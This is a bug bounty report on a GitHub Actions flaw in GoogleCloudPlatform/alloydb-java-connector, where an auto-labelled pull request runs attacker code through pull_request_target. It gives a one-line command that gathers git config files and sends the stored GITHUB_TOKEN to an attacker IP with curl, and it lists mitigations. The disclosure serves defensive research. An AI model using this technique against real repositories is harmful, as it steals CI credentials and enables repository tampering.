Skip to Content (Press Enter)
Google
Bug Hunters
GITHUB_TOKEN leak that gives `issue: write` and `id-token: write` permissions to `GoogleCloudPlatform/alloydb-java-connector` repository
Reported by:
Vasilii Ermilov
Google VRP
triaged
22:30 | Apr 23, 2024
accepted
08:29 | Apr 25, 2024
fixed
16:02 | May 9, 2024
reward decided
$100
Summary:
GITHUB_TOKEN leak that gives
issue: write
and
id-token: write
permissions to
GoogleCloudPlatform/alloydb-java-connector
repository
Program:
OSS VRP
URL:
https://github.com/GoogleCloudPlatform/alloydb-java-connector
Vulnerability type:
Sensitive data exposure
Details
Summary:
Due to users code checkout in
ci.yaml
Github action
, it's possible for an attacker to craft a Pull Request that will contain malicious
.kokoro/build.sh
file with a script that will be executed at
Check Coverage
step
and will extract GITHUB_TOKEN secret that is used for running workflow and has
issue: write
and
id-token: write
permissions for the repository.
more information in the docs:
https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#potential-impact-of-a-compromised-runner
Details:
Github action is started on Pull Request via
ci.yaml
Action can be triggered by
pull_request_target:
event , which does not require approval from the owner of the repo.
However,
pull_request_target
event must be
"labeled"
Since, there is the
auto-label
bot
enabled
for this repository, it is possible to craft a PR title, e.g. "spanner: ignored" that will be automatically labeled with "api: spanner" tag (
Documentation
) and
pull_request_target
event will be trigered.
After that, the code submitted in the PR is checked out at
https://github.com/GoogleCloudPlatform/alloydb-java-connector/blob/55e39d9138a5bd9061420307b67a467ddb2b9555/.github/workflows/ci.yaml#L46
without
persist-credentials: false
which means that GITHUB_TOKEN is stored in the filesystem (
link
) of the machine that is running the workflow and can be extracted with malicious bash scripts submitted by attacker and executed in the
Run tests
step
In most cases it is possible to exfiltrate the
GITHUB_TOKEN
with the following technique.
find $HOME/work -type f -name config | xargs cat | curl --data @- http://{IP}
This works because the
actions/checkout
action
persists credentials with a local git config by default
.
The supplied
.kokoro/build.sh
script is run at
https://github.com/GoogleCloudPlatform/alloydb-java-connector/blob/55e39d9138a5bd9061420307b67a467ddb2b9555/.github/workflows/ci.yaml#L46
Which gives opportunity for an attacker to craft a script that will exfiltrate
GITHUB_TOKEN
Token has
issue: write
and
id-token: write
permissions
which can be used to tamper Issues and Pull Requests, e.g. approve PR or potentially exfiltrate cloud credentials that are used for this repository.
Mitigation
Add
persist-credentials: false
to
Checkout code
step at
https://github.com/GoogleCloudPlatform/alloydb-java-connector/blob/55e39d9138a5bd9061420307b67a467ddb2b9555/.github/workflows/ci.yaml#L44
Check for specific labels on the PR before running a job, e.g.
https://github.com/GoogleCloudPlatform/cloud-sql-proxy/blob/HEAD/.github/workflows/lint.yaml#L26
Supporting Material/References:
https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability
https://securitylab.github.com/research/github-actions-preventing-pwn-requests/
https://r2c.dev/blog/2021/protect-your-github-actions-with-semgrep/
Attack scenario
The attack can be triggered by any Github account without interaction with the owner of the repository.
Impact
GITHUB_TOKEN is leaked
Attacker gets write access to Issues and Pull Requests of
GoogleCloudPlatform/alloydb-java-connector
repository, including PR approval.
Attacker gets write access to
id-token
and potentially has opprotunity to get cloud credentials that are used for this repository.
登录
使用 Google 账号登录